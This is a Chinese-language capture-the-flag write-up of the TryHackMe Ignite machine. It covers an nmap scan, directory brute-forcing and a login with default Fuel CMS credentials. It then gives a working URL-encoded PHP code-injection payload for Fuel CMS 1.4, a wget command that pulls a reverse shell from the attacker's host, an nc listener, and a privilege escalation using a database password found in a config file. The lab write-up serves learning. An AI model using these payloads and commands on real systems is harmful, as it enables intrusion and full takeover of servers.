服务发现
┌──(rootkali)-[~/tryhackme/lgnitevm]└─# nmap -sV -Pn 10.10.248.97 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 02:05 EDTNmap scan report for 10.10.248.97Host is up (0.33s latency).Not shown: 999 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds目录爆破
┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u http://10.10.248.97 -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-lowercase-2.3-medium.txt _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| ) Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 207627Error Log: /root/dirsearch/logs/errors-21-09-24_02-06-31.logTarget: http://10.10.248.97 [02:06:32] Starting: [02:06:36] 200 - 16KB - /0 [02:06:44] 301 - 313B - /assets -> http://10.10.248.97/assets/[02:06:56] 200 - 16KB - /home [02:08:01] 200 - 16KB - /index [02:10:53] 400 - 1KB - /$file [02:11:51] 200 - 70B - /offline CTRL+C detected: Pausing threads, please wait... 首页剖析
首先显示是一个叫Fuel CMS的CMS,版本号是1.4
裸露了目录的一些门路信息
裸露了原始登录明码:
That's it!To access the FUEL admin, go to:http://10.10.248.97/fuelUser name: adminPassword: admin (you can and should change this password and admin user information after logging in)咱们应用admin:admin到http://10.10.248.97/fuel登录,能够登录!
然而进去貌似找不到能够批改php源码的入口
在kali搜寻这个cms的可利用破绽
┌──(rootkali)-[~/tryhackme/lgnitevm]└─# searchsploit Fuel CMS 1.4 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------fuel CMS 1.4.1 - Remote Code Execution (1) | linux/webapps/47138.pyFuel CMS 1.4.1 - Remote Code Execution (2) | php/webapps/49487.rbFuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) | php/webapps/48741.txtFuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated) | php/webapps/48778.txt---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Resultspython和ruby脚本我这边执行不了,不过ruby的payload独自拿下来到浏览器能够执行
payload,执行ls命令
view-source:http://10.10.248.97/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a('ls')%2B%27
下载一个正经的webshell
view-source:http://10.10.248.97/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a('wget http://10.13.21.169:8000/reverse_shell.php ')%2B%27
执行反弹
http://10.10.248.97/reverse_s...
获取webshell,拿到flag
┌──(rootkali)-[~]└─# nc -lnvp 1234 1 ⨯listening on [any] 1234 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.248.97] 58620Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 00:38:36 up 1:39, 0 users, load average: 0.00, 0.00, 0.32USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can't access tty; job control turned off$ cd /home$ lswww-data$ cd www-data$ lsflag.txt$ cat flag.txt6470e394cbf6dab6a91682cc8585059b 在/var/www/html/fuel/application/config/database.php找到数据库的配置文件
$db['default'] = array( 'dsn' => '', 'hostname' => 'localhost', 'username' => 'root', 'password' => 'mememe', 'database' => 'fuel_schema', 'dbdriver' => 'mysqli', 'dbprefix' => '', 'pconnect' => FALSE, 'db_debug' => (ENVIRONMENT !== 'production'), 'cache_on' => FALSE, 'cachedir' => '', 'char_set' => 'utf8', 'dbcollat' => 'utf8_general_ci', 'swap_pre' => '', 'encrypt' => FALSE, 'compress' => FALSE, 'stricton' => FALSE, 'failover' => array(), 'save_queries' => TRUE);尝试用root:mememe登录root账号,胜利登录,拿到root.txt
$ su rootsu rootPassword: mememeroot@ubuntu:/# cat /root/root.txtcat /root/root.txtb9bbcb33e11b80be759c4e844862482d root@ubuntu:/#